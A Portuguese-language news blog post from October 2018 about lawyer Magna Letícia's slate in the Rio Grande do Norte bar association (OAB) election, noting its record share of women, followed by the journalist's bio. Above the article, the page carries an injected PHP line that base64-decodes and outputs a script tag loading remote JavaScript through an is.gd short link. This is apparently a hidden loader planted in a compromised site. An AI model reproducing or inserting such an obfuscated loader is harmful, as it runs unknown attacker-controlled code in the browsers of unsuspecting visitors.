$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Chapa de Magna Letícia marca feito histórico na OAB: a maior participação feminina em diretoria de Conselho Estadual

Chapa de Magna Letícia marca feito histórico na OAB: a maior participação feminina em diretoria de Conselho Estadual
31 Out 2018

                A candidata a presidente da OAB Magna Letícia, da chapa “Juntos por uma nova Ordem”, já traz na própria composição da chapa uma grande demonstração do vanguardismo para a OAB potiguar. A composição do grupo apresenta o maior número de integrantes femininas para conselheira estadual da história da OAB. São três advogadas para a diretoria do Conselho Estadual.

                Além disso, a “Juntos por uma nova Ordem” traz a real possibilidade da instituição ter sua primeira presidente mulher em toda sua história de 86 anos.

                Magna Letícia é advogada há quase 35 anos com atuação intensa na área tributária. Já foi Conselheira Estadual da OAB/RN e na última eleição encabeçou a oposição, destacando-se pela grande quantidade de votos. Traz em seu discurso, a necessidade de romper com esse modelo de administrar a OAB sempre pelo mesmo grupo e do dever de resgatar o protagonismo da instituição.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *